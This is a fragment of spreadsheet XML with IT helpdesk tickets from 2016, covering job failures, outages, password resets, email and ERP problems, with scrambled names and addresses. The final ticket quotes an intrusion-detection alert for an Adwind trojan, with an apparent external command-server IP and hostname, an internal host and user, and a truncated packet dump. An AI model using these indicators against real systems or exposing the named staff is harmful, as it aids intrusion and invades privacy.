    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39cold failed in job_scheduler at: 09/03/2016 19:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_79cold failed in job_scheduler at: 09/03/2016 19:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_79cold failed in job_scheduler at: 09/03/2016 19:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_47cold failed in job_scheduler at: 09/03/2016 19:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_47cold failed in job_scheduler at: 09/03/2016 19:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="node HostName_587 located at germany is down since  6:19 pm 9/3 et"/>
    <s v="node HostName_587 located at germany is down since  6:19 pm 9/3 et"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="node HostName_20 located at Israel is down since  9/3 at  5:15 pm et"/>
    <s v="node HostName_20 located at EMEA is down since  9/3 at  5:15 pm et"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1665 failed in job_scheduler at: 09/03/2016 18:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1665 failed in job_scheduler at: 09/03/2016 18:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_484 failed in job_scheduler at: 09/03/2016 12:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_484 failed in job_scheduler at: 09/03/2016 12:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="delete personal address from system"/>
    <s v="from: qpixeudn rjlziysd _x000a_sent: saturday, september 03, 2016 5:04 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: ifblxjmc dyrgfwbm; jayachandran reddy_x000a_subject: re: ee personal address in system_x000a__x000a_hello all..._x000a_bill here on sat. morning battling a hurricane in va. beach. _x000a_i looked back at the e mailsi have received on my g mail account and see one from callie with &quot;hrssc&quot; as a copy list. candice with the same copy list and a lynda at hr shared service with again the same copy list. _x000a_i hope this helps!!_x000a__x000a_bb_x000a_bigtyl bachsmhdyhti_x000a_eastern zone manager_x000a_company_x000a__x000a_on sep 2, 2016, at 5:20 pm, nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt; wrote:_x000a_hi candice,_x000a_ _x000a_does this happen when you send an email to a specific group or all the groups that bill is a part of? if it is a  single group, may i know the group's name?_x000a_ _x000a_"/>
    <s v="qpixeudn rjlziysd"/>
    <x v="26"/>
  </r>
  <r>
    <s v="job Job_1983 failed in job_scheduler at: 09/03/2016 08:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1983 failed in job_scheduler at: 09/03/2016 08:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="no sound "/>
    <s v="no sound "/>
    <s v="vjwdyanl knfsjdgz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create  erp notification "/>
    <s v="_x000a__x000a_received from: dfiyvmec.wxioadpt@gmail.com_x000a__x000a_[cid:image001.png@01d205fe.ffce2de0]_x000a__x000a_kuhgtyjvelu. u_x000a_manager â€“ reliability engineering_x000a_dfiyvmec.wxioadpt@gmail.com&lt;mailto:dfiyvmec.wxioadpt@gmail.com&gt;_x000a__x000a_"/>
    <s v="dfiyvmec wxioadpt"/>
    <x v="44"/>
  </r>
  <r>
    <s v="inwarehouse_tool format - issue outputs to e-mail"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zfliqpxm.dgfvaqlh@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_while using t/c  zz_mails  we are getting inwarehouse_tools in 2 different formats._x000d__x000a_please refer enclosed e-mails_x000d__x000a__x000d__x000a_inwarehouse_tool 0512673680       : not okay_x000d__x000a__x000d__x000a_inwarehouse_tool 0512669014       : is okay_x000d__x000a__x000d__x000a_please help us in getting all inwarehouse_tools as per format appearing in inwarehouse_tool 0512669014_x000d__x000a__x000d__x000a_"/>
    <s v="zfliqpxm dgfvaqlh"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_1913 failed in job_scheduler at: 09/03/2016 06:34:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1913 failed in job_scheduler at: 09/03/2016 06:34:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1996 failed in job_scheduler at: 09/03/2016 06:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1996 failed in job_scheduler at: 09/03/2016 06:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="i can't logon erp at home, please help to solve this issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: baoapacg.wanrtyg@company.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d2060f.78853e80]_x000d__x000a__x000d__x000a_"/>
    <s v="rekpvblc ufysatml"/>
    <x v="18"/>
  </r>
  <r>
    <s v="network outage:milton keynes, uk - divestiture site: site is hard down since at 3:46 am et on 09/03.no backup "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______3:46 am et on 09/03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job bk_hana_SID_62_os_dly_dp failed in job_scheduler at: 09/03/2016 04:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_os_dly_dp failed in job_scheduler at: 09/03/2016 04:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="new order"/>
    <s v="from: jmfvwrek pqwehmzgagannathan _x000d__x000a_sent: saturday, september 03, 2016 9:54 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: notification: fw: re: new order_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_am forwarding the trailing mail received. kindly do the needful. _x000d__x000a__x000d__x000a_"/>
    <s v="jmfvwrek pqwehmzg"/>
    <x v="26"/>
  </r>
  <r>
    <s v="ad account locked "/>
    <s v="ad account locked "/>
    <s v="ezkgipuv ozcvnkht"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to web "/>
    <s v="unable to connect to web ,and check download files "/>
    <s v="bearzclk xnvqipcz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="emails not available in outlook but available in owa"/>
    <s v="_x000a__x000a_received from: dargthy.sohfyuimaiah@company.com_x000a__x000a_team,_x000a__x000a__x000a_i am unable to view emails in outlook of june 2015 and before, but i can see them in owa._x000a__x000a__x000a_its difficult to analyze the old emails in owa compared to outlook._x000a__x000a__x000a_could you please help in refreshing the emails in outlook._x000a__x000a__x000a_my outlook version is 2016._x000a__x000a__x000a_best "/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1384 failed in job_scheduler at: 09/03/2016 01:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1384 failed in job_scheduler at: 09/03/2016 01:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="desktop icon size issue"/>
    <s v="name:jvpkulxw ovuweygj_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jvpkulxw.ovuweygj@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:desktop icon size issue"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 09/02/2016 22:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 09/02/2016 22:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="mouse started jumping all over the screen again."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ulroqsyf.wctpnarb@gmail.com_x000d__x000a__x000d__x000a_i had this problem earlier._x000d__x000a_this was resolved by replacement of hardware._x000d__x000a__x000d__x000a_however i am experiencing this problem again..pl support_x000d__x000a__x000d__x000a_"/>
    <s v="ulroqsyf wctpnarb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vpn vpn access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qfcxbpht.oiykfzlr@gmail.com_x000d__x000a__x000d__x000a_for some reason my logon information won't work with vpn vpn access tonight.  could you please investigate?  the following is the link i follow._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_               "/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2573 failed in job_scheduler at: 09/02/2016 18:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2573 failed in job_scheduler at: 09/02/2016 18:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="#mm2247736 can not inwarehouse_tool consignment mb58 acct 81254672, total 36 piezas."/>
    <s v="#mm2247736 can not inwarehouse_tool consignment mb58 acct 81254672, total 36 piezas."/>
    <s v="houcdelq wnypackq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp report zcor0003 variant rod stock 1 is working for some employee's in the usa plant."/>
    <s v="report won't work."/>
    <s v="xjeblpst dohnewjg"/>
    <x v="43"/>
  </r>
  <r>
    <s v="unable to edit quantities under oppurtunities in crm"/>
    <s v="unable to edit quantities under oppurtunities in crm. refer attachment._x000a__x000a_phone: "/>
    <s v="tmopbken ibzougsd"/>
    <x v="39"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="qdmrlzby ouvyfkwc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need email address to login to outlook"/>
    <s v="need email address to login to outlook"/>
    <s v="lsnpqxhw nplqhzrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hana "/>
    <s v="_x000a__x000a_received from: nealxjbc.owjduxai@gmail.com_x000a__x000a_earlier i started a chat with rakthyesh.  i was pulling a report though hana and after selecting the analysis tab and refreshing i was thing going to display.  i needed to filter this template to add my plant.  when i would select display all of my boxes were empty (see attached).  he did something and asked me to close and reopen.  once i reopened my analysis tab was gone so i wasn't able to refresh to then go to display to see if my filters were fixed._x000a__x000a_he then fixed my analysis tab while we were still in chat but after doing this when i tried to select display the white boxes that i was seeing was no longer showing.  i would hit display and all i could see was my spreadsheet (no boxes)._x000a__x000a_he said he would have to do a ticket.  i've not been copied on a ticket buy i need to run this report._x000a__x000a_before sending this email i went back into hana to see if by chance my report or problem was fixed and the analysis tab is gone again._x000a__x000a_if you can please correct this for me._x000a__x000a_nealxjbc owjduxai_x000a_customer service supervisor, cec infrastructure_x000a_nealxjbc.owjduxai@gmail.com&lt;mailto:nealxjbc.owjduxai@gmail.com&gt;_x000a_"/>
    <s v="nealxjbc owjduxai"/>
    <x v="8"/>
  </r>
  <r>
    <s v="change accounts from full time employee to contractor"/>
    <s v="hello,_x000a__x000a_effective september 5 please change merthayu and behsnjty's accounts from employees to vendors and donot deactivate their accesses.based on my conversation with khrtyujuine, snhdfihytu and suhtnhdyio, opening this ticket._x000a__x000a_"/>
    <s v="qcehailo wqynckxg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="interface fa0/21 on company-sa-bra-sao-pollaurido-switch-c-2950-access-sw03.company.com is down since 2:25pm on 09/2/16"/>
    <s v="interface: fastethernet0/21 Â· 1721 router embertell(61.01.52.026) on company-sa-bra-sao-pollaurido-switch-c-2950-access-sw03.company.com is down since 2:25pm on 09/2/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_115 :volume consumed on : c:\ is more than 85% ."/>
    <s v="HostName_115: volume: c:drive on server is over 85% space consumed. space available: 4.5 g "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="outlook email font size issue"/>
    <s v="outlook email font size issue"/>
    <s v="sdlixwmb zvygmnco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1108 failed in job_scheduler at: 09/02/2016 15:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1108 failed in job_scheduler at: 09/02/2016 15:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="vanteksj astelnqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: , malaysia - (company) network is down since 2:16pm et on 09/02/16"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________2:16pm et on 09/02/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no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____no_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cannot log into skype or vpn"/>
    <s v="name:qjeymnzs wgpelvyn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:qjeymnzs.wgpelvyn@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cannot log into skype or vpn. this happens every time i change my password.  i will need someone to log into my computer and fix some certificates or whatever to make it work again."/>
    <s v="qjeymnzs wgpelvyn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="light indicator"/>
    <s v="from: cwuospin nbhoxqpe _x000a_sent: friday, september 02, 2016 11:48 pm_x000a_to: ouaepwnr pqnteriv; -facility; nwfodmhc exurcwkm_x000a_subject: amar re: light indicator_x000a__x000a_help desk,_x000a__x000a_please see the request below _x000a__x000a_sincerely,_x000a__x000a_stanfghyley guhtykes, fmp_x000a_facilities manager, world headquarters_x000a_cwuospin.nbhoxqpe@gmail.com_x000a_"/>
    <s v="zgyudxbt exrluhdb"/>
    <x v="36"/>
  </r>
  <r>
    <s v="outlook not connecting to microsoft exchange"/>
    <s v="outlook not connecting to microsoft exchange"/>
    <s v="sghamujc shompueb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vrtx at south_amerirtca  with light blinking"/>
    <s v="vrtx at south_amerirtca  is showing orange light blinking at front panel._x000d__x000a_please see attached file."/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reference: inplant_851936"/>
    <s v="while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'. when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'_x000a__x000a_phone; "/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp logon balancing error"/>
    <s v="erp logon balancing error"/>
    <s v="chkmejsn lvidgknc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="newly created emails are not getting sent, they are all going into the outbox."/>
    <s v="newly created emails are not getting sent, they are all going into the outbox."/>
    <s v="yodgaxsp ucjynprt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="erp rounding off the total of an order"/>
    <s v="we have quotes 3116232719, 3116233894 and 3116234383, that gives me the correct unit price but the total of the entire quote is rounding off.  can this be fixed?  customers will deny payment if the total doesn't match what the unit price is.  "/>
    <s v="iqbyrtop izpmvgfq"/>
    <x v="12"/>
  </r>
  <r>
    <s v="product selector not working"/>
    <s v="this appears to be an issue with all environments."/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="unable to make incoming and outgoing calls from the company phone "/>
    <s v="unable to make incoming and outgoing calls from the company phone "/>
    <s v="jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cyber security - phish uacyltoe hxgaycze report september 2016"/>
    <s v="cyber security - phish uacyltoe hxgaycze report september 2016"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to connect to companysecure"/>
    <s v="unable to connect to companysecure"/>
    <s v="tmjxhlwf nacglwiu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to network in usa, michigan"/>
    <s v="unable to connect to network in usa, michigan"/>
    <s v="ixwymcbz yxmoihjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mapping printers "/>
    <s v="mapping printers "/>
    <s v="pacvbetl yptglhoe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="india company: tcl circuit packet drops since at 10:30 am est on 09/02. site is active on primary."/>
    <s v=" packet drops in the internet link .tcl#3060oc020916"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ft. mill cec outlook connectivity"/>
    <s v="the majority of csrs in the usa cec work remote.  we are currently on vpn.company.com for vpn due to the upgrade.  however, our outlook is continually freezing and we have had to reboot just to get it back."/>
    <s v="dtwuqpmo otupcawz"/>
    <x v="26"/>
  </r>
  <r>
    <s v="reset password "/>
    <s v="_x000a__x000a_received from: koahsriq.wdugqatr@gmail.com_x000a__x000a_hello,_x000a_please reset password for vvterra qlhmawgi sgwipoxn  (terralink for russia office)_x000a__x000a__x000a_Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,_x000a_ÐµÐ²Ð³ÐµÐ½Ð¸Ñ._x000a__x000a__x000a_koahsriq wdugqatr,_x000a_administrative assistant._x000a_koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;_x000a__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for fmeozwng pfneutkg"/>
    <s v="password reset for fmeozwng pfneutkg"/>
    <s v="qcwoejsk cowdbfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 erp production password reset"/>
    <s v="name:dhkovprf pltndoab_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dhkovprf.pltndoab@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:locked out of erp SID_34 on too many password attempts. tried to use what i know is my password but it won't let me. may be due to SID_39 access request ticket_no0435983"/>
    <s v="dhkovprf pltndoab"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath issue"/>
    <s v="infopath issue"/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype login issue : personal certificate error"/>
    <s v="skype login issue : personal certificate error"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access."/>
    <s v=" x2215_x000a_summary:require jftyff bgtyrant, user name brahdthyu, to be usaed access to HostName_856._x000a__x000a_"/>
    <s v="mlckvyfq aonlxvwb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="distributor_tool "/>
    <s v="_x000d__x000a__x000d__x000a_received from: brhlcpqv.sfozwkyx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you help me on entering the distributor_tool company?_x000d__x000a_i'd already contacted with rakthyesh, and he helped me enter the system with the password he gave but it didn't still work. i've changed the password after he sent me an email but this problem couldn't be solved._x000d__x000a_have a great day._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="brhlcpqv sfozwkyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="joining skype meetings through iphone"/>
    <s v="joining skype meetings through iphone"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problems with quoting engine. refer attachment."/>
    <s v="problems with quoting engine. refer attachment._x000a__x000a_phone; 44 "/>
    <s v="obanjrhg rnafleys"/>
    <x v="21"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="lwbchnga axpqctfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delegation query, owa and checking emails older than 12 months."/>
    <s v="delegation query, owa and checking emails older than 12 months."/>
    <s v="jwhmqnye xlpvdwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent: samag lieferschein sales order #35612545 - fehler in batches"/>
    <s v="_x000a__x000a_received from: vujymcls.sgpmyviq@gmail.com_x000a__x000a_hallo it,_x000a__x000a_bitte dringend um hilfe, da der lkw bereits hier zur abholung der werkzeuge vor ort steht und dringend ein lieferschein erstellt werden muss!_x000a__x000a_bitte um klÃ¤rung, danke!_x000a__x000a_[cid:image001.png@01d20529.8d8000e0]_x000a__x000a_best "/>
    <s v="vujymcls sgpmyviq"/>
    <x v="17"/>
  </r>
  <r>
    <s v="computer name"/>
    <s v="_x000d__x000a__x000d__x000a_received from: koahsriq.wdugqatr@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a_please set the pc name for new laptop windows 7._x000d__x000a_we're in russia office_x000d__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="32"/>
  </r>
  <r>
    <s v="email confirmation to login to hub"/>
    <s v="email confirmation to login to hub"/>
    <s v="wqfnhbuz ptlqknre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook profil / correction of phone number and cell phone number"/>
    <s v="_x000d__x000a__x000d__x000a_received from: byclpwmv.esafrtbh@gmail.com_x000d__x000a__x000d__x000a_hello help team,_x000d__x000a__x000d__x000a_how can i update below data in outlook. my phone-# and cell-phone-# isn't correct._x000d__x000a__x000d__x000a_"/>
    <s v="byclpwmv esafrtbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33765965 ) : possible adwind malware trojan - rqxl7406113"/>
    <s v="source ip :10.40.6.221_x000a_system name :rqxl8517224_x000a_user  name:qxhdcnmj caflvjrn(vefghgarr)_x000a_location :usa_x000a_sep , sms status :no updates_x000a_field sales user ( yes / no) :  no_x000a_dsw event log:see below_x000a_=========================================================================================================================_x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 411230755_x000a_event summary: 52046 vid70697 adwind malware ssl certificate detected (inbound)_x000a_occurrence count: 173_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 191.101.151.14_x000a_source hostname: foreach-rcp.enceinjury.net._x000a_source port: 5000_x000a_source ip geolocation: barcelona, esp_x000a_destination ip: 10.40.6.221_x000a_destination hostname: rqxl8517224 _x000a_destination port: 58471_x000a_connection directionality: incoming_x000a_protocol: tcp_x000a__x000a_device information_x000a_device ip: 10.32.100.17_x000a_device name: isensor03.company.com_x000a_log time: 2016-09-01 at 19:18:48 utc_x000a_action: not blocked_x000a_vendor eventid: 336126_x000a_cvss score: -1 _x000a_vendor priority: 1_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 928535_x000a_inspector rule id: 277082_x000a_inspector event id: 051975334_x000a_ontology id: 200020003203755190_x000a_event type id: 200020003203575398_x000a_agent id: 102805_x000a__x000a_event detail:_x000a_[**] [1:21163157:1] 52046 vid70697 adwind malware ssl certificate detected (inbound) [**]_x000a_[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602982][event id: 336126][time: 2583868639.892461]_x000a_[src ip: 191.101.151.14][dst ip: 10.40.6.221][sport/itype: 5000][dport/icode: 58471][proto: 6]_x000a_09/01/2016-19:18:48.89246sartlgeo lhqksbdx91.101.151.14:5000 -&gt; 10.40.6.221:58471_x000a_tcp ttl:108 tos:0x28 id:4647 iplen:20 dgmlen:1294 df_x000a_***a**** seq: 0xef831d96 ack: 0x8da0e8db win: 0x103 tcplen: 20_x000a_==pcap 1==_x000a__x000a_[o:security]_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_.......w-...........e(...'@.l..&quot;.e...(.....g........p...........?...m..w...xos...li....d:.+ti.7u.{..f.m.w......q.3*..@\.s..o..0..4....c..'..................0...0..w........#..0...*.h........071.0...u....fr1.0...u....assylias.inc1.0...u....assylias0...150118163720z..21141235163720z071.0...u....fr1.0...u....assylias.inc1.0...u....assylias0...0...*.h.............0............v.4.........,.n.......3..c@.....w........z.%..^...u*8.|..#.p......!.8.....c....(.@.e.....b...06......q...p.{...\.tltz....,p.....~o...no.d.zw...^.x&lt;.b-..wh'......6...i...u1..:.)g...6t..b...gb...{.../.p...ac.........s.\.l.*......=.r).._......p.h.........p?..y...d....=z.#4~7&lt;cy;..}.[^'z.w&amp;..p.2..g)?.f.......g,;b.dj..oy..7..j......,.h...&quot;h$......z).=...i.s}....o+^.|.......s..[9..?a......!0.0...u.............u.n....n!z..10...*.h.............s.d..0.*..p._?....(.qko...2........x~-..to.....|.....\.s.{.........&amp;u..f.#..i...@.hn.1.p.\..7u;.n.....*}.m....e....]....cn,.....$..i..-.).w....u..h.......c...b.....ik....5..z.h.o.'t.8a6......r..&quot;z0.......k...gt.7#..&amp;s.^.......7{;..7....t..z..4x&gt;...v.l.o.........6...{fn!...)r..p..{..e.....`.g+.....q....i.f...p..o...m....k.&amp;_.....m.,.&amp;e.....y...j!.m......u..q.................,..z+.w........a.!.........._...lcbq.g..f............j..h.&quot;....%...n8.kd.l.i&amp;.r......g.@......|.@..,...wd..!+e.....u]..@y.._x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000 0c00 0000 187f c857 2d9e 0d00 0e05 0000 .......w-......._x000a_000010 0e05 0000 4528 050e 1227 4000 6c06 9022 ....e(...'@.l..&quot;_x000a_000020 bf65 970e 0a28 06dd 1388 e467 ef83 1d96 .e...(.....g...._x000a_000030 8da0 e8db 5010 0103 0c0c 0000 1603 0306 ....p..........._x000a_000040 3f02 0000 4d03 0357 c87f 1258 6f53 9c89 ?...m..w...xos.._x000a_000050 876c 69d6 beb5 c164 3ae0 2b74 6916 3755 .li....d:.+ti.7u_x000a_000060 0d7b e5ef 6698 6d20 57c8 7f12 d17f f371 .{..f.m.w......q_x000a_000070 f233 2a10 bf40 5cc6 73d1 b56f 9b8a 301d .3*..@\.s..o..0._x000a_000080 1f34 1c1c e397 6391 c027 0000 05ff 0100 .4....c..'......_x000a_000090 0100 0b00 0419 0004 1600 0413 3082 040f ............0..._x000a_0000a0 3082 0277 a003 0201 0202 041f 239d bd30 0..w........#..0_x000a_0000b0 0d06 092a 8648 86f7 0d01 010b 0500 3037 ...*.h........07_x000a_0000c0 310b 3009 0603 5504 0613 0246 523sartlgeo lhqksbdx530 1.0...u....fr1.0_x000a_0000d0 1306 0355 040a 130c 6173 7379 6c69 6173 ...u....assylias_x000a_0000e0 2e49 6e63 3111 300f 0603 5504 0313 0861 .inc1.0...u....a_x000a_0000f0 7373 796c 6961 7330 2017 0d31 3530 3131 ssylias0...15011_x000a_000100 3730 3532 3631 395a 180f 3231 3134 3132 8163720z..211412_x000a_000110 3234 3035 3236 3139 5a30 3731 0b30 0906 35163720z071.0.._x000a_000120 0355 0406 1302 4652 3115 3013 0603 5504 .u....fr1.0...u._x000a_000130 0a13 0c61 7373 796c 6961 732e 496e 6331 ...assylias.inc1_x000a_000140 1130 0f06 0355 0403 1308 6173 7379 6c69 .0...u....assyli_x000a_000150 6173 3082 01a2 300d 0609 2a86 4886 f70d as0...0...*.h..._x000a_000160 0101 0105 0003 8201 8f00 3082 018a 0282 ..........0....._x000a_000170 0181 00a5 dada b576 0334 83c6 bd9f 93cc .......v.4......_x000a_000180 c418 0a2c e74e 1cb0 14eb 870b 9033 9dea ...,.n.......3.._x000a_000190 6340 b2f3 19ff 2057 eaeb bda7 10fd 2e99 c@.....w........_x000a_0001a0 5afe 259f a35e 8492 f955 2a38 f17c 928d z.%..^...u*8.|.._x000a_0001b0 23dd 70e7 a7eb 0a82 ef21 8a38 9ea4 e7b5 #.p......!.8...._x000a_0001c0 b763 8bbb bcb4 2889 4091 45c8 95a8 8583 .c....(.@.e....._x000a_0001d0 4299 b3f0 3036 1d17 de9f c4a2 51dc aa05 b...06......q..._x000a_0001e0 501c 7bef aa1e 5c14 546c 745a b4f0 e7b9 p.{...\.tltz...._x000a_0001f0 2c50 b518 abca c97e 4f93 d47f 4e6f 7f44 ,p.....~o...no.d_x000a_000200 e97a 77c8 8817 5ed8 783c cf42 2def f677 .zw...^.x&lt;.b-..w_x000a_000210 6827 11cf 1309 f5b1 3686 b8b4 6920 ca93 h'......6...i..._x000a_000220 7531 d9ef 3aeb 2947 9310 9636 54f4 d562 u1..:.)g...6t..b_x000a_000230 fa14 9f47 42e4 d7aa 7b04 a19c 2fe3 500a ...gb...{.../.p._x000a_000240 b1d9 6143 e80f 17ed deab 909e 9a73 965c ..ac.........s.\_x000a_000250 0c6c ad2a 9df4 8497 14b7 3dca 5229 acc1 .l.*......=.r).._x000a_000260 5f02 b59b e51c ef50 9f48 95b9 9cfe ae93 _......p.h......_x000a_000270 cfef 0c70 3f81 8f59 8cec 0344 8803 9fb8 ...p?..y...d...._x000a_000280 3d7a db23 347e 373c 6379 3b02 867d 0b5b =z.#4~7&lt;cy;..}.[_x000a_000290 5e27 5a0d 5726 1ec5 